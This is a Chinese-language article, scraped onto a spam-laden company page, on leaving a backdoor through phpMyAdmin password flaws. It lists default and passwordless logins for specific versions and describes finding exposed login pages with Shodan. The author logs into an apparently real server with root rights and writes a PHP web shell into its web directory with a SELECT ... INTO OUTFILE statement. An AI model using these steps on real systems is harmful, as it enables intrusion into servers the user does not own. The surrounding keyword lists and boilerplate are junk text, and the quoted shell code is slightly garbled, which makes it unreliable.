濮阳杆衣贸易有限公司

主頁 > 知識庫 > phpMyAdmin通過密碼漏洞留后門文件

phpMyAdmin通過密碼漏洞留后門文件

熱門標簽:蘇州外呼系統(tǒng)有效果嗎 兼職做地圖標注好賺錢嗎 亳州企業(yè)外呼系統(tǒng) 地圖標注怎么做商戶驗證 山東電銷卡外呼系統(tǒng)原理是什么 智能電銷語音機器人資訊 海南外呼系統(tǒng)方案 400 電話 辦理 打開百度地圖標注
  • 默認 phpMyAdmin:用戶名 root 密碼 root 或空登陸。
  • 版本 2.11.3~2.11.4:用戶名 'localhost'@'@" 登陸,無需密碼。
  • 版本 2.11.9.2:用戶名 root 登陸,無需密碼。

經(jīng)測試,第二個漏洞在 phpMyAdmin 3.5.1 版本也是可行的。原理從略。

下面讓我們簡單的上網(wǎng)看看能不能找到一些存在這樣漏洞的登陸頁面。

祭出著名的漏洞搜索引擎 Shodan 并搜索 phpMyAdmin。

phpMyAdmin

先看看有沒有不需要密碼登陸的,逐一嘗試沒有后尋找名字中包含的版本號。這里我找到一個國內(nèi)的(浙江省·杭州市)。

地址已手動打碼。

http://121.***.*.219:80/

登陸成功(root 權限)。

接下來你可以寫一個 outfile 到對方主機的網(wǎng)絡目錄下。俗稱 “留后門”。

SELECT "?php system($_GET[‘cmd']); ?>" into outfile "后門文件的絕對路徑"

點擊運行,不出意外便在對方主機留下了一個名為 runme.php 的后門文件。

總結

以上就是這篇文章的全部內(nèi)容了,希望本文的內(nèi)容對大家的學習或者工作具有一定的參考學習價值,謝謝大家對腳本之家的支持。如果你想了解更多相關內(nèi)容請查看下面相關鏈接

您可能感興趣的文章:
  • PHP中的變量覆蓋漏洞深入解析
  • PHP網(wǎng)站常見安全漏洞,及相應防范措施總結
  • phpcmsv9.0任意文件上傳漏洞解析
  • PHP5.0 TIDY_PARSE_FILE緩沖區(qū)溢出漏洞的解決方案
  • 由php中字符offset特征造成的繞過漏洞詳解
  • PHP-CGI遠程代碼執(zhí)行漏洞分析與防范
  • 你不知道的文件上傳漏洞php代碼分析
  • PHP序列化/對象注入漏洞分析
  • PHP常見漏洞攻擊分析
  • PHP編程中的常見漏洞和代碼實例
  • 詳解各種PHP函數(shù)漏洞

標簽:綏化 溫州 紹興 清遠 萊蕪 呼倫貝爾 安康 金華

巨人網(wǎng)絡通訊聲明:本文標題《phpMyAdmin通過密碼漏洞留后門文件》,本文關鍵詞  phpMyAdmin,通過,密碼,漏洞,;如發(fā)現(xiàn)本文內(nèi)容存在版權問題,煩請?zhí)峁┫嚓P信息告之我們,我們將及時溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《phpMyAdmin通過密碼漏洞留后門文件》相關的同類信息!
  • 本頁收集關于phpMyAdmin通過密碼漏洞留后門文件的相關信息資訊供網(wǎng)民參考!
  • 推薦文章
    无为县| 邹城市| 孟州市| 肥西县| 涪陵区| 新津县| 绥滨县| 宜良县| 桂东县| 瓦房店市| 阿拉善左旗| 响水县| 阆中市| 嘉义市| 吕梁市| 镇原县| 绥中县| 丹江口市| 板桥市| 颍上县| 商城县| 饶河县| 肇庆市| 定日县| 塔河县| 平陆县| 清徐县| 宕昌县| 兰州市| 贡嘎县| 凤凰县| 盐池县| 三原县| 清新县| 灌南县| 兴文县| 江阴市| 酒泉市| 元阳县| 慈利县| 杭州市|